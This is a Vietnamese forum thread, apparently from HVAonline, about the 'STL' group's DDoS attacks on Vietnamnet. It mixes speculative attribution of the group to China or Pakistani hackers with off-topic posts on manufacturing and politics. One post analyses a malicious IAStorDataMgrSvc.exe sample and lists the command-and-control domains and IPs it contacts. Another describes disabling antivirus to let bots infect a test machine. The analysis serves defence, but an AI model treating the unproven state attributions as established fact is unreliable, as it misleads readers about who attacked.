| |
|
|
kutruoi wrote:
@PXMMRF : thông qua những gì anh tâm tình qua những bài viết, em thêm nể phục anh PXMMRF vì ngoài là một chuyên gia hoá học, một nhà kinh doanh chèo lái con thuyền công ty, tạo công ăn việc làm cho mọi người; còn là một IT master nữa . quả thật đáng khâm phục biết bao .
em cũng đang bán các mặt hàng hoá chất cơ bản và các hoá chất đặc biết cho các ngành công nghiệp mía đường, ethanol, giấy, plastic. không biết anh và công ty có nhu cầu mua không ạ. em sẽ sent qoutation ngay mà. giá okie luôn. em bán hàng dạo, rồi bán hoá chất, giờ lại muốn làm IT em chẳng biết em sẽ đi về đâu buồn quá cơ .  ( xin các anh em chỉ giáo cho ạ .
Nhất trí thôi!
Em cứ send your best quotation đến đi nhé ( Đừng viết là "sẽ sent qoutation" đấy, hì hì).
Chủ yêu là các hoá chất dùng cho Latex cao su thiên nhiên và cao su khô (chemicals for natural rubber latex and dry rubber). Sẽ liên hệ qua email sau.
|
 |
|
|
Cám ơn ý kiến thông minh của conmale.
-----------
Hì hì đây lai là vấn đề "chữ nghĩa"
Thưc tế luôn đa dang, phong phú và phức tạp, nên không một câu chữ nào thâu tóm hết nôi dung đầy đủ của nó.
Thành thử có thể cùng một câu chữ, mà người nay hiểu thế này, người khác hiểu thế kia.
"Đi tắt" thì đúng là phải đi theo con đường ngắn nhất và phải đi đúng đường rồi.
Còn "đón đầu" có nghĩa là ta phải đến đúng chỗ họ đang đứng . Nhưng cũng có nghĩa là phải đến mục tiêu trước họ hay đến điểm mà họ đang cố đi đến, cố hướng tới (mà họ chưa đến đươc), theo nghĩa mở rộng
Thưc ra muốn đi tắt đón đón đầu trong công nghệ trước hết phải hiểu rất kỹ công nghệ mà người ta đang áp dụng, phải tìm hiểu thêm các kiến thức khác và cũng phải có những yếu tố sáng tao (innovation) nữa. Nếu không cũng không thể đón đầu được.
Tai sao như vậy? Vì áp dung một công nghệ mới đã định hình vào hoàn cảnh VN hay hoàn cảnh một công ty, muốn thành công phải có yếu tố sáng tạo. Nếu không chắc chắn sẽ thất bại. Thành thử các yếu tố bắt chước và sáng tạo đan xen vào với nhau
|
|
|
|
Tôi đọc khá kỹ bài viết của bạn rongchaua. Tính tôi là như vậy. Đoc kỹ để hiểu ý họ viết và ẩn ý nếu có sau câu viết. Tôi không chỉ đọc phớt qua rồi đã có ý kiến tán đồng hay phản bác. Nếu thuận lơi tôi cũng sẽ tìm hiểu người viết là ai, họ đang làm công việc gì, họ có am hiểu về chủ đề đang bàn hay không? Vì có thể họ chưa viết hết ý họ nghĩ, vì một vài lý do nào đó... vân vân.
Quay trở lai vấn đề "đi tắt đón đầu , nắm bắt công nghệ cao"
Trước hết "Đi tắt đón đầu" theo nghĩa đen của nó là một hành động tìm con đường tắt, ngắn hơn, để đi, nhằm đuổi kip người đã đi trước mình. Đó là điều trong thưc tế dân gian thường làm, nên nó không có gì là sai cả, hay là khác.
Sau nữa, tôi không hề nói "đi tắt đón đầu nắm bắt công nghệ cao" theo kiểu VN, hay như một số nhà máy, cơ quan Việt nam đã làm vừa qua. Tôi không hề đề cập đến ý này. Nhưng dường như bạn đã bình luận theo ý đó.
Có lẽ tôi là một trong số không nhiều người hiểu rõ về những nguy hiểm, ngớ ngẩn và tổn thất nặng nề về việc đi tắt đón đầu nắm bắt công nghệ cao của Việt nam, nói chính xác hơn là của khá nhiều nhà máy, cơ quan Việt nam, đăc biệt là các công ty, tập đoàn do nhà nước quản lý (chủ sở hữu là nhà nước). Có nhiều nguyên nhân, trong đó có nguyên nhân là họ có sẵn tiền, đươc ưu tiên cấp tín dụng hoặc vay với lãi suất quá ưu đãi, như là tiền chùa vậy.
Tại sao tôi lại biết rõ như vậy, lý do đơn giản là cách đây khoảng 2-3 năm tôi phải hoàn tất một luận án Thac sĩ QTKD (lớp học do các giáo sư Mỹ, châu Âu dạy) dày khoảng 100 trang. Đề tài của luận án là nghiên cứu những tồn tại, bất cập trong hoạt đông KT của các công ty, tập đoàn vốn sở hữu nhà nước dẫn đến hiệu quả thấp, nhiều nguy cơ phá sản. Tồn tai của các tập đoàn, công ty nhà nước thì nhiều, trong đó dĩ nhiên có cả hiện tượng "đi tắt đón đầu. đón bắt công nghệ cao" một cách chủ quan, không khoa học và thiếu tính toán, gây lãng phí nghiêm trong. Tôi phân tích khá kỹ vấn đề này với các thí dụ cụ thể (khoảng 3-4 trang gì đó)
Tôi nhớ lúc đó tôi khẳng định là Vinashin phải bị coi là phá sản, vì nợ vay của họ đã gần gấp 10 lần vốn sở hữu (trong khi nơ gấp 2 lần vốn là công ty đã phải đặt vào tình thế báo động) và họ không có khả năng trả nơ khi đáo hạn nơ.
Thôi hơi lan man, quay lai vấn đề. Thưc ra cũng có một số ít XN, công ty VN (thường chỉ là các công ty tư nhân hay công ty cổ phần vốn tư nhân chiếm ưu thế) vẫn có cách đi tắt đón đầu nắm công nghệ cao một cách khôn ngoan, hơp lý và có hiệu quả thưc tế (Xin nhớ là tôi đang viết dòng chữ "đi tắt đón đầu nắm bắt công nghệ cao" với nghĩa như tôi đã viết ở đầu bài viết này. Đừng mang cách hiểu của người khác ghép vào đây)
Lấy thí dụ ngay tai công ty sản xuất của chính tôi cho thưc tế và dễ hiểu. Công ty tôi sản xuất găng mổ từ cao su thiên nhiên. Công nghệ pha chế latex cao su thiên nhiên với các hoá chất (Vulcanizing agent, Accelerator, Activator...) là bước công nghệ quan trọng quyết định năng suất và chất lượng sản phẩm để có thể canh tranh trên thị trường quốc tế. Tôi đươc đi thưc tập sản xuất tai Ấn độ trong 6 tháng và tôi chủ động đi tham quan sản xuất tai nhiều công ty Malaysia, Thailand, dù để đươc tham quan không dễ chút nào. Ở các công ty Ấn độ và Malaysia, Thailand việc pha chế- lưu hoá latex đươc thưc hiện trên một hệ thống lớn gồm nhiều thùng khuấy có 2 lớp vỏ, dùng gia nhiệt. Các cánh khuấy đươc truyền động lắc qua lắc lại từ một hệ thống truyền đông trung tâm. Tôi mất nhiều thời gian nghiên cứu rất kỹ thưc tế sản xuất ở các nước nói trên, cũng như đoc vô vàn tài liệu KT liên quan đến công nghệ này. Tôi nhận ra một điều là nếu đi theo con đường công nghệ của họ thì không thể nào cạnh tranh với họ được. Vì họ đã có nhiều kinh nghiệm trong việc thưc hành công nghệ (này), họ có một nguồn vốn đầu tư lớn và sản phẩm của họ đã chiếm lĩnh thị trường TG nhiều năm nay, kể cả thị trường VN. Từ đó tôi quyết định nghiên cứu một công nghệ -thiết bị mới, khác hoàn toàn với công nghệ và thiết bị của các nước nói trên. Hệ thống thiết bị pha chế lưu hoá latex do tôi thiết kế là hệ thống lưu hoá-khuấy trộn tuần hoàn phòng đốt ngoài dưới chân không, hoat đông theo một nguyên lý khá hiện đại. Thiết bị gọn nhẹ chỉ chiếm diện diện tích bằng 1/5 đến 1/10 diện tích chiếm chỗ của hệ thống cũ và có hiệu quả kinh tế, kỹ thuật cao. Chất lượng sản phẩm tăng lên rõ rêt. Găng của công ty tôi nay chiếm 50-60% thị phần VN và đánh bật găng nhập khẩu từ nước ngoài, vì chúng tốt hơn và rẻ hơn. Ngoài ra tôi cũng áp dung công nghệ Nano (sử dụng các vật liêu cỡ hat Nano - 1 nano= 1 phần tỷ mét, 1 phần ngàn micron) vào công nghệ sản xuất găng mổ. Do vậy găng của công ty tôi có hình thức khá đẹp (óng ánh, trong trẻo) và có độ bền cơ học cao.
Bài hoc thành công của công ty tôi là nghiên cứu kỹ, rất kỹ công nghệ của các nước khác và từ đó tìm ra một công nghệ mới, nắm bắt đươc chiều hướng phát triển của công nghệ cao, không đi theo, bắt chước rồi cố hoàn thiện công nghệ của các nước khác.
(Với công trình này và các công trình khác nữa tôi đã nhận giải nhất Khoa hoc-công nghệ VN năm 2006 và có thể năm nay tôi sẽ nhân Giải thưởng NHà nước về KH-CN- Không hiểu có đươc không?)
Qua thí dụ trên ta thấy khi nói "đi tắt đón đầu , nắm bắt công nghệ cao" là cần nói rõ thêm là làm theo cách nào, theo kiểu nước nào?. Nếu nói là làm theo kiểu VN, thì cũng nói rõ là theo kiểu công ty nào, đơn vị nào?
Nhật bản sau chiến tranh (repeat after second world war) cũng có những trường hơp và thí dụ như trường hơp công ty tôi. Có điều là nó nhiều hơn, rộng khắp trong nền công nghiệp và chắc là khoa học và thông minh hơn. Nếu cần tôi sẽ cho thí dụ về trường hơp xe gắn máy 4 thì và...........các lò phản ứng nguyên tử. Cái gì tôi cũng muốn viết thật thưc tế, để các bạn đọc đỡ chán.
|
|
|
|
Trong trao đổi kỹ thuật IT và qua đó dự đoán danh tính và đông cơ của những kẻ can dư vào các hành vị phạm tội (như STL) ta cần bình tĩnh, khách quan và tôn trọng ý kiến lẫn nhau. Như thế mới vui, thích thú và bổ ích.
Riêng bạn kutruoi, tôi có ý kiến như sau:
Chúng ta không nên có thái độ cưc đoan, chẳng bàn về kỹ thuật gì, chỉ chăm chăm tìm cơ hôi để nói xấu nhà nước, chế độ.
Tôi không bênh chế độ, nhưng chuyện nào ra chuyện đó. Không nên lợi dụng một kẽ hở nào đó để nói ra các bực tức vô cớ của mình.
Thí dụ : Bạn viết "Đi tắt đón đầu, đón bắt công nghệ" (câu này bạn viết ẩu, không hết ý, phải viết rõ là công nghệ gì chứ?) hoàn toàn không phải là chuyện sai. Nước Nhật cũng đã làm như vậy sau chiến tranh thế giới thứ hai, nên họ mới đuổi kịp Mỹ. Về công nghệ, theo tôi, hiện nay họ vẫn đứng ở mức tiên tiến, chỉ kém Mỹ ở một vài lĩnh vưc. TQ chưa thể so sánh với họ được. Vấn đề chỉ là đi tắt đón đầu nắm bắt công nghệ cao, tiên tiến theo cách nào cho đúng mà thôi.
Thứ hai là tại sao bạn lại có thể viết câu này: "tìm hài cốt liệt sỹ " lợn" ( vì toàn tìm ra xương động vật thôi mà " . ...chết thật ! một xã hội hư vô và lập lờ. nơi mà con người chẳng biết họ là chính ai."
Bạn đang sống ở VN hay ở Mỹ?. Sau chiến tranh, có rất nhiều cựu chiến binh VN, bỏ ra rất nhiều tiền bạc, thời gian, công sức của mình ra để tìm hài cốt đồng đội. Với họ "Nghĩa tử là nghĩa tận". Họ muốn tìm lai những vết tích còn lai của những người đã cùng mình chiến đấu, cùng vui buồn có nhau, cùng chia nắm cơm nguôi trước giờ khai chiến, đắp chung một tấm chăn rách. Họ làm như vậy không vì một chế độ, một lý tưởng cao xa nào cả, cũng không làm để lâp công, thăng chức, vì họ đã về hưu, giải ngũ từ lâu rồi. Họ làm vì tình người, vì một tình cảm thiêng liêng giữa những người luôn phải đối mặt với cái chết, cái mất mát xé lòng. Vì vậy nói những người ấy chỉ đi tìm xương lợn chứ không phải là hài cốt của đồng đôi chẳng những là đã thoá mạ họ một cách tàn ác và ngu suẩn, mà còn thiếu hẳn đi một tấm lòng của con người nhân hậu.
Việt nam cũng tham gia tìm hài cốt của lính Mỹ chết trong chiến tranh. Tôi nghĩ đó là việc cần thiết và nhân đạo. Hài cốt của lính Mỹ cũng cần được trân trong như hài cốt của bộ đội VN. Vì bản tính của người Việt là "Nghĩa tử là nghĩa tận".
|
|
|
|
hvthang wrote:
Post /hvaonline/posts/list/900/39641.html#246798 của bác PXMMRF vẫn đang chỉ là một định hướng cho cách phân tích và nhìn nhận vấn đề theo cách thức phù hợp hơn chứ cũng chưa đưa ra được một dẫn chứng nào thuyết phục cho việc stl là ai cả.
............................................
hvthang wrote:
Các phân tích về dàn khoan của TQ của bác PXMMRF em vẫn chưa nhìn thấy giá trị trong việc nhận định stl, hơn nữa nó còn làm cho hướng nhận định stl dễ bị sa vào một hướng duy nhất.
Phân tích về dàn khoan của tôi chỉ là một "Thí dụ" nhằm minh hoạ cho một quan điểm của tôi là:
PXMMRF wrote:
Cũng cần nói thêm là việc quan sát và biết về một bối cảnh, hoàn cảnh không đồng nghĩa với việc đã nhận thức nó một cách đúng đắn và sâu sắc. Thí dụ...
Vì vậy nó không liên quan gì đến STL hay chính xác hơn là tổ chức lãnh đạo (sai khiến) STL cả.
Khi đọc các bài tôi viết, xin một số bạn chịu khó bỏ ra vài phút nghiền ngẫm. Không phải là "Nói Sơn Tây, chết cây Hà nội", mà có đôi chỗ, đôi câu là "Ý tại ngôn ngoại" đấy!
hvthang wrote:
Cho tới giờ, mọi thông tin về stl đều chỉ dừng ở mức phỏng đoán và nếu vậy thì em vẫn nghiêng về phía những phỏng đoán dựa vào những dấu hiệu cụ thể (các phân tích kỹ thuật) hơn là cảm quan của một vài người, dù những người đó (bao gồm bác PXMMRF) thường có những nhìn nhận đúng trước đây.
Thì các "dấu hiệu cụ thể (các phân tích kỹ thuật)" mà bạn viết chính là cái tôi gọi là các "hiện tượng" trong bài viết trên đây của tôi. Chỉ có điều tôi nói thêm là:
"Nếu xét riêng từng hiện tượng, tách rời nó với các hiện tượng khác, chúng ta sẽ khó xác định hay tìm ra những mối liên quan với danh tính hay động cơ của những người can dự vào sự kiện. Nghĩa là chúng ta khó coi nó là một bằng chứng (evidence) tin cậy.
Nhưng nếu chúng ta gôp chung chúng, tổng hơp chúng với nhau và đặt chúng trong một bối cảnh, hoàn cảnh cụ thể thì lai thấy những bằng chứng rất đáng tin cậy."
Ngoài ra tôi còn đề nghị phải tìm hiểu, nhận xét bối cảnh, hoàn cảnh đó một cách toàn diện, chính xác và sâu sắc.
--------------------------
Nhân đây tôi "bật mí" cho các bạn một thông tin.
Trong bài viết đánh giá về tổ chức của STL (bao gồm chính bản thân STL và bộ phận lãnh đạo, hướng dẫn nó) trong topic này tôi có viết một câu:
PXMMRF ngay17/08/2011 luc 15:44:12 wrote:
Nếu ai đó nói về một vài công việc khác mà có thể STL đang làm, chúng ta có thể phải kinh ngạc về khôi lương công việc họ phải làm và thán phục về ý tưởng sâu xa, thâm hiểm của họ.
Bai viết tại: /hvaonline/posts/list/450/39641.html#245191
Thì nay xin tiết lộ, câu viết trên đây ám chỉ sự kiện sau:
http://nhipsongso.tuoitre.vn/Nhip-song-so/455316/Tran-lan-web-mao-danh-lanh-dao.html
Vào thời gian viết bài nói trên, tôi đã biết sư kiện này và đang tìm hiểu nó. Vì chưa tìm hiểu kỹ nên chưa thể thông báo.
Nay báo NLĐ và Tuổi trẻ online đã thông báo sự kiện, nên không còn gì là bí mật nữa. Tuy nhiên thực tế nghiêm trong và kinh hãi hơn thông tin trên báo nhiều.
|
|
|
|
Nowhereman wrote:
................................
@ALL : nếu quả thật cuối cùng bọn STL này có liên quan ít nhiều đến Trung Quốc thì : anh PXMMRF < nhất định có được thông tin ngầm này ở một nơi nào đó. Hoặc vì lý do gì đó anh PXMMRF biết nhưng không thể, hoặc không tiện hoặc không dám nói thẳng ra ở HVA . vì tôi theo rõi các bước forensic của anh PXMMRF từ những phần đầu và thấy rằng anh PXMMRF luôn có "ý" về liên quan tới bọn tàu; chứ chỉ dựa vào các cách track back theo kỹ thuật đơn thuần thì quả thật rất khó có thể nói được có tầu tây gì tham gia hay không vào đám STL này; Thêm nữa yếu tố chính trị và Vietnamnet có liên quan gì đây ? Tôi đã từng hồ đồ mà suy diễn rằng "không có sự liên quan của Tàu khựa" nhưng giờ mới thấy mình ngây thơ. Quả thật chung kết, chung thời vận sắp đến rồi. Lòng người đen tối hơn . 
Vâng! Điều bạn đoán chắc là có. Nhưng đấy cũng chỉ là những xác minh lai sau này, để biết thật chắc chắn suy nghĩ của mình (của tôi) là đúng, hay ít nhất là có cơ sở thực tế, mà thôi. Chúng không phải là những thông tin mà tôi biết ngay từ đầu.
Khi xét đoán, nhận định một sự kiện, cũng như danh tính, đông cơ (motivation) của những người can dự vào sự kiện ấy, phải đặt sự kiện vào bối cảnh, hoàn cảnh (situation) xã hôi, đất nước, thế giới cụ thể và đương thời của nó. Nếu không như vậy, thì rất khó xét đoán, nhận định sự kiện một cách đúng đắn hoặc sẽ có những suy nghĩ quá đơn giản, chỉ chuyên môn (kỹ thuật) đơn thuần, hay bị lệch hướng.
Chúng ta cũng nên lưu ý, bối cảnh ở đây không chỉ liên quan đến chính trị. Những cuộc điều tra của McAfee
về làn sóng tấn công DDoS vào nhiều website của Mỹ, Đại hàn và một vài nước khác thời gian gần đây, đã đươc công bố tại các địa chỉ sau:
1. http://blogs.mcafee.com/mcafee-labs/10-days-of-rain-in-korea
2. http://blogs.mcafee.com/mcafee-labs/malware-in-recent-korean-ddos-attacks-destroys-systems
và đăc biệt là:
http://blogs.mcafee.com/mcafee-labs/revealed-operation-shady-rat
cũng là một phần quan trọng vẽ lên bối cảnh, hoàn cảnh nói trên một cách toàn diện.
Không chỉ McAfee, các công ty bảo mật trên mạng khác, cũng có một số báo cáo điều tra với nội dung tương tự.
Trong một sự kiện xảy ra có nhiều hiện tượng. Nếu xét riêng từng hiện tượng, tách rời nó với các hiện tượng khác, chúng ta sẽ khó xác định hay tìm ra những mối liên quan với danh tính hay động cơ của những người can dự vào sự kiện. Nghĩa là chúng ta khó coi nó là một bằng chứng (evidence) tin cậy.
Nhưng nếu chúng ta gôp chung chúng, tổng hơp chúng với nhau và đặt chúng trong một bối cảnh, hoàn cảnh cụ thể thì lai thấy những bằng chứng rất đáng tin cậy.
Những hiện tượng riêng rẽ nói trên ta có thể tìm thấy không ít trong các bài viết của anh TQN, của tôi, của các bạn khác và ngay cả trong các bài viết của anh conmale, trong chủ đề này.
Không chỉ vậy, việc xác định danh tính, động cơ của những người can dự vào sự kiện có nhiều trường hợp đòi hỏi phải theo dõi trong một thời gian đủ dài. Thí dụ tôi theo dõi sư kiện mà ta đang bàn trong chủ đề (topic) này, từ lúc PA Việt nam bị chiếm đoạt tên miền pavietnam.net, pavietnam.com, nghĩa là đã khá lâu, như tôi đã từng viết. Nhất thời rất khó xác định.
Cũng cần nói thêm là việc quan sát và biết về một bối cảnh, hoàn cảnh không đồng nghĩa với việc đã nhận thức nó một cách đúng đắn và sâu sắc. Thí dụ chúng ta biết về sự kiện TQ đã hoàn tất một dàn khoan lớn trị giá tới gần 1 tỷ USD, có thể hoạt động ở các vùng biển sâu tới 11.000m và khoan thăm dò tai vùng đáy biển sâu tới 3.000m, thì ta dễ choáng ngợp với tiềm năng kinh tế- kỹ thuật của TQ. Và có khi ta chỉ dừng suy nghĩ của mình tai điểm này.
Nhưng nếu chúng ta tiếp tục suy nghĩ thì sẽ có nhiều câu hỏi được đặt ra cho chính mình.
Chúng ta tư hỏi TQ đã mất bao nhiêu năm để làm xong cái dàn khoan thăm dò dầu khí khổng lồ này?. Thời gian thiết kế và chế tao chắc chỉ khoảng trên dưới 3 năm. Nhưng như vậy cũng là khá dài. Tuy nhiên ở các nước theo hệ thống quản lý XHCN thì thủ tục trình duyệt một dự án lớn như vậy vốn tốn rất nhiều thời gian. Từ khi các cấp lãnh đạo đưa ra ý tưởng ban đầu, rồi đến bước thiết lập dự án kinh tế-kỹ thuật khả thi, rồi trình các cấp lãnh đạo từ thấp đến cao nhất thông qua, góp ý, sửa đi sửa lai ... tốn ít nhất từ 3 đến 5 năm. Như vậy ta phải thấy TQ đã bắt đầu các bước chuẩn bị và tiến hành chế tao dàn khoan từ rất lâu rồi. Không phải chỉ thời gian mới đây.
Câu hỏi tiếp theo là TQ sẽ đặt dàn khoan khủng ấy ở đâu trên biển Đông? Câu trả lời của những chuyên gia dầu khí am hiểu là: Nó cần phải đặt ở khu vực quần đảo Trường sa, gần khu vưc bãi Gac ma mà TQ đã chiếm của VN năm 1988. Khu vưc này là "rốn dầu" của biển Đông, có trữ lượng dầu khoảng trên dưới 200 tỷ barrel dầu thô, kèm theo một khối lượng khí khổng lồ, cỡ nhất nhì thế giới.
Nền kinh tế phát triển nhanh và rất nóng của TQ tiêu thu một khối năng lương khổng lồ, trong đó chủ yếu là dầu. Hiện TQ chỉ có khả năng tự sản xuất và cung cấp khoảng 3 đến 4% nhu cầu dầu. Nếu nền công nghiệp của họ thiếu dầu cung cấp hay việc cung cấp bị gián đoạn thì nền kinh tế của TQ sẽ sụp đổ nhanh chóng kiểu "lá bài domino", chế độ và quyền lực của các cấp lãnh đạo cao nhất cũng sụp đổ theo.
Vừa qua TQ đầu tư một khoản tín dụng khổng lồ vào các nước châu Phi, châu Mỹ Latinh để đổi lai các quyền lơi kinh tế, trong đó có việc đươc cung cấp dầu, nguyên liêu thô.. một cách ổn định. Tuy nhiên sự sụp đổ gần đây của chính quyền các nước châu Phi như Ai câp, Lybia... đã gây không ít khó khăn và tổn thất cho TQ. Sư cung cấp dầu đươc kỳ vọng là đầy đủ và liên tục từ các nước này trở thành sự thất vọng năng nề.
Từ bối cảnh trên chúng ta hiểu rõ tai sao vừa qua TQ lai kiên quyết không đàm phán với VN về chủ quyền Hoang sa (thông tin công khai trên các báo TQ), kiên định lập trường về đường "lưỡi bò" chiếm hơn 80% diện tích biển Đông là "chủ quyền không thể bàn cãi" của TQ là lợi ích "cốt lõi" của quốc gia này.
Câu hỏi tiếp theo nữa là dàn khoan khủng sẽ đươc đưa ra vị trí dự định và đứng một mình à? Không phải, nó phải đi kèm theo từ 3 đến 4 tầu lai, dắt. Xung quanh nó phải có các tầu tiếp tế, các chiến hạm, tầu ngầm bảo vệ nữa. Thế là một vương quốc nhỏ thuộc chủ quyền TQ sẽ được đặt tai khu vực quần đảo Trường sa.
Câu hỏi cuối cùng, chắc không phải là cuối cùng đâu, là dàn khoan sẽ liên lạc thường xuyên với đất liền, với các chiến hạm bằng cách nào?
Vị trí dự kiến đặt dàn khoan cách VN khoảng 400 km, cách luc đia TQ, điểm gần nhất, là xa gấp 3 lần, khoảng 1000-1200km. Với khoảng cách này không thể kéo cáp quang từ đất liền ra dàn khoan được. Như vậy việc liên hệ phải thông qua vệ tinh (satellite communication). Vậy thì TQ chống hack qua con đường vệ tinh thế nào nhỉ? TQ hiện có bao nhiêu vệ tinh và có vệ tinh địa tĩnh nào của TQ đặt ngay trên biển Đông không nhỉ?
Cứ thế ta sẽ có hàng loạt câu hỏi về một sự kiên. Đặt ra và tìm cách trả lời chúng, ta có có thể nhận thức sâu sắc, chính xác về sự kiện.
|
|
|
|
THẢO LUẬN THÊM VỀ IAStorDataMgrSvc.exe FILE
1- Bạn 1visao gần đây có upload lên Mediafire một file .rar có tên là "IAStore_26_08_2011" và nhờ HVA kiểm tra xem các file .dll và .exe trong file này có phải là virus-trojan của STL không? Anh TQN đã RCE và phân tích file này, bài viết trong topic. Xin các bạn tham khảo.
2- File (process) IAStorDataMgrSvc.exe là một Chipset sofware của Intel, tên là Intel(R) Rapid Storage Technology. Phần mềm này download tai downloadcenter.intel.com (File iata_enu_10.6.0.1022.exe, dung lương khoảng 7 MB). Intel(R) Rapid Storage Technology soft. hỗ trợ cho nhiều Dell Desktop khi áp dụng RAID 5-10 và cũng hỗ trợ RAID 0, 1, AHCI & Matrix RAID trong một số Dell desktop và cho các mobile platforms.
Intel đôi lúc gọi soft này là một "driver". Như vậy Intel(R) Rapid Storage Technology (mà IAStorDataMgrSvc.exe nằm trong nó), liên quan nhiều đến Dell hardware.
Từ đó ta thấy soft này không phổ biến và số người sử dụng nó chắc không nhiều.
3- Khi cài đặt (tôi đã cài thử Intel(R) Rapid Storage Technology vào máy mình) thì service-process IAStorDataMgrSvc.exe nằm ở 2 thư mục sau: C:/Program Files/Intel/Intel(R) Rapid Storage Technology/IAStorDataMgrSvc.exe và C:/WINDOWS/system 32/. Vì vậy nếu phát hiện IAStorDataMgrSvc.exe nằm ở các thư mục khác thì nó có thể là một virus hay Trojan.
Nhiệm vụ của IAStorDataMgrSvc.exe (origin file) theo tôi đại thể là khi khởi đông nó kích hoạt hàng loạt file .dll (giống như trường hợp của iTunesHelper.exe-origine trong iTunes 10.4 chẳng hạn, không phải là malicious iTunesHelper.exe) và "sắp xếp" chúng theo một sơ đồ tiến độ đã định để máy tính hoạt động nhanh và hiệu quả nhất. Vì vậy nó đóng một vai trò khá quan trọng trong hệ thống. Vả lại những software liên quan và điều khiển hardware như SCSI Adapter, RAID... thường khá phức tạp.
4- Trong quá khứ (cách đây từ vài năm) nhiều hiện tượng process IAStorDataMgrSvc.exe bị hư hỏng (error) hay sai sót (corruption) thường được báo cáo cho Intel. Có một số trường hơp phát hiện process này bị nhiễm virus. Khi IAStorDataMgrSvc.exe bị hư hỏng thì máy có hiện tượng chạy châm (do IAStorDataMgrSvc.exe chiếm một tỷ lệ cao trong năng lưc CPU được sử dụng, có khi đến 80-90%), máy hay restart.... Khi bị nhiễm virus, máy có những kết nôi đến các website lạ (của hacker) và trang default của trình duyệt hay bị thay đổi....
5- Tôi vừa thử nghiêm kích hoạt malicious IAStorDataMgrSvc.exe (nằm trong file do bạn 1visao cung cấp) trên máy của mình để kiểm tra. Những hiện tương sau đây được xác nhận sau khi đã kiểm chứng nhiều lần:
- Không có bất cứ một cuộc tấn công DDoS nào đươc thưc hiện từ máy của tôi. Tất nhiên là không có cuộc tấn công DDoS vao vietnamnet. Malicious IAStorDataMgrSvc.exe trong trường hơp này (từ ban 1visao cung cấp) không phải là một DDoS tool.
- IAStorDataMgrSvc.exe thường xuyên khời phát quá trình kết nôi với 3 website và một IP address như sau:
easy.lixns.com (119.153.92.129)-webserver đặt tai Pakistan
direct.fqin.net (119.153.92.110) -webserver đặt tai Pakistan
find.laxt.net (74.115.79.191) -webserver đặt tai Mỹ
IP: 239.255.255.250
Khi check vào các website-webserver này thì thấy chỉ có webserver direct.fqin.net là active (nối mạng) còn 3 cái còn lại thì inactive-offline.
Có vài đăc điểm:
- Khi check webserver direct.fqin.net thấy nó mở 3 cổng 21, 23 và 80, thấy một server tên là RomPager/4.07 UPnP/1.0 (đây là 1 software của ZyXEL router- như vậy hacker có thể đang dùng router để Remote access vào một máy mục tiêu, thông qua Telnet) thay vì NGINX như lãnh đạo STL thường làm
- Các webserver này chỉ hosting một website, như đã thông kê trên đây.
6- Kết luận IAStorDataMgrSvc.exe do ban 1 visao cung cấp không phải là một DDoS tool, càng không phải là một DDoS tool tấn công vào vietnamnet. Nhưng đó là một Malicious IAStorDataMgrSvc.exe . Nó chắc không phải là một "sản phẩm " (mèo què- như anh TQN hay gọi) của lãnh đạo STL. Nó có thể của các hacker khác, thí dụ Pakistan hacker chẳng hạn.
|
|
|
|
crc32 wrote:
Tin buồn cho stl là AVAST! cũng vừa mới chộp cổ mớ malwares trong iTunes.rar.
Nó chộp iTunesHelper.exe từ sáng sớm hôm qua (30-8-2011), khi tôi thử nghiệm lai quá trình DDoS vào mục tiêu.
Bây giờ muốn thử nghiệm một số bot-DDoS tool của STL phải "chiều" chúng như "chiều vong". Phải disable Antivir guard, có lúc phải disable cả Avira, hạ hết Firewall, cẩn thận disable cả McAfee on-access scan, disable cả các chương trình dự đoán có thể conflict với nó....để STL bot có thể nhiễm được vào máy của mình. Hì hì
TQN wrote:
http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn
Kể ra up cũng khá nhiều, và hầu hết đã bị Avira chụp hết, ngay cả cái IAStor cũng đã được đưa vào danh sách.
Avira số 1, KAV+MS số 2. Bỏ công sức ra viết mail cũng đáng.
Cho đến sáng nay (31.8.2011-9.00AM) Avira vẫn chưa detect đươc các files trong "IAStore_26_08_2011.zip" (gồm 5 file .dll và 1 file .exe sau khi extracted) là virus, TQN ạ!
|
|
|
|
conmale wrote:
PXMMRF wrote:
texudo wrote:
PXMMRF wrote:
Có bạn trong một bài viết trong topic nay vẩn còn cho, hay ám chỉ là các CA mạng Việt nam tổ chức tấn công DDoS vừa qua trên mang, hay cho là các thành viên STL là CA mạng VN thì có lẽ họ không đọc kỹ các bài viết trong topic này, hay đọc mà không hiểu. Chẳng lẽ CA mạng VN lại tấn công liên tục, ác liệt vào VIETNAMNET, một cơ quan truyền thông quan trong của nhà nước, chính quyền VN à?
Thực ra xác định ai là người chủ đạo tấn cống VNN đã khá rõ ràng rồi, nhưng nói CA mạng VN không dính dáng tới thì là chưa chắc chắn. VN bây giờ nhiều phe phái, bè cánh và lợi ích.
Có thể có phe phái, nhóm lơi ích. Nhưng thưc tế không có phe nhóm nào lai dám, hay dại gì làm các hành động ảnh hưởng đến kết cấu hạ tầng vật chất, kỹ thuật của đất nước (cũng là của nhân dân với tư cách là người đóng thuế để xây dựng các hạ tầng ấy). Nếu hành động, họ (phe, nhóm) chỉ có thể làm các việc khác.
Nếu có một số người làm tay sai cho nước ngoài, phá hoại đất nước, thì đó lai là chuyện hoàn toàn khác. Nghĩa là họ không còn nằm trong các phe nhóm khác nhau trong nôi bộ một đất nước, một nhà nước. Mà họ đã thuôc một thế lưc ngoại bang.
Chào anh PXMMRF,
....................................................................................................................
Nếu stl là tay sai của thế lực nào đó của ngoại bang, tại sao những nguồn thông tin chính thức và các cơ quan chức năng hoàn toàn im lặng? Tại sao "trung tâm an ninh mạng" to lớn như vậy hoàn toàn im hơi lặng tiếng? Tại sao cho đến bây giờ, vietnamnet vẫn bị tấn công và từ hồi đầu 2010, khi vietnamnet bị tấn công vẫn hoàn toàn không có bất cứ một thông tin nào chính thức công bố về những hoạt động trái với pháp luật của nhóm tấn công? Nước Việt Nam không đủ sức truy lùng và lên tiếng về những hành vi phạm pháp và đen tối của thế lực ngoại bang kia sao?
Đó cũng là những câu hỏi mà tôi luôn trăn trở.
Nay tình hình đã sáng ra, thông qua các phân tích của HVA vừa qua.
"Trung tâm an ninh mạng" chỉ là một đơn vị hoạt đông theo kiểu hành chính. Biên chế của họ ít, nên không thể làm được các việc quan trọng, đòi hỏi nhiều công sức. Họ làm được gì các năm qua, thì ta đã thấy.
